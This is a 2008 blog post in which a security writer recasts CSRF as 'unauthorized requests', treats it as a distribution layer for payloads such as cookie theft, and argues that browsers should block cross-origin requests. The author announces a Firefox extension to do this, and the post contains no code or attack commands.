The Snare Of Unauthorized RequestsApril 21, 2008 – 8:02 AM
Almost everyone knows what CSRF or better unauthorized requests are. I never really embraced CSRF as the correct term for unauthorized request issues, because the term is outdated and inadequate to contemporary hacking. For me, an unauthorized request is the layer or automation of a hacking procedure without direct interference of the hacker. I usually illustrate this by comparing unauthorized requests to a trap, or snare utilized by survivors or hunters. It is automated to catch, and the victim will trigger his own capture due the the automation. There isn’t a lot of skills involved here, it is easy to set up. The only thing an attacker needs to do is wait.
Most vulnerabilities are due to unauthorized requests being made. Almost all cross site scripting attacks are only useful when a unauthorized request is made. In order to do something more useful than to print alert boxes, attackers need to make remote, or non-same origin requests. Like logging cookies, phoning home, or requesting a worm. SQL injection can be achieved also by unauthorized requests due to the fact that it’s a verbatim GET request. When I am very strict, I’ll even say that SQL injection is also request abuse of the programming layer. In this case, the program of software is the victim of unauthorized requests. Even many vulnerabilities that are designed to exploit browsers do sometimes rely on unauthorized requests in the architecture of the browser, like calling system function or simply browser internals which should not be exposed in a secure browser.
So CSRF or unauthorized requests are multi-dimensional, and can appear in any place. It’s very important to understand the notion that it is only a distribution layer for the actual payload. Whether it be session stealing, cookie stealing or a complete automated reconfiguration of your router. The attack is automated, instead of directly targeted like most network attacks are. With this in mind, I like to stress the importance of the distribution layer instead of it’s payload. Without distribution, the payload cannot be transported. Hence the distribution layer must be flawed. Preventing unauthorized requests should be the focus in web application security, because we can continue to invent new rules, signatures, and vectors, but as we all learn that is an arms-race which is very difficult to win, and it won’t stop unknown attacks yet to be invented.
TCP/IP and browsers.
I hear you, it will break the features. Screw the features, that is an excuse. There isn’t anything I cannot do without requesting 3rd party information on a website. So what is the solution? I gave it many thoughts, and I came to the conclusion that it’s up to the browser vendors to enforce content policies. I am not sure how their efforts are in this region, and since I do not want to wait I announced that I am starting to build an extension for Firefox that enforces content restrictions, or better: restricts all unauthorized requests that are requested beyond the same domain scope. If successful, the only attacks remain attacks that are performed on the same origin domain. That cannot be stopped, but again when you want to do something interesting you still need to make requests beyond the same origin to store or log the stolen data. So it leaves us only with low level attacks, and notably phishing which isn’t a security issue but a user-learning issue.
There are little drawbacks actually, a machine must do what I tell him to, not the other way around. So stopping unauthorized requests at it’s roots is the bare minimum to me.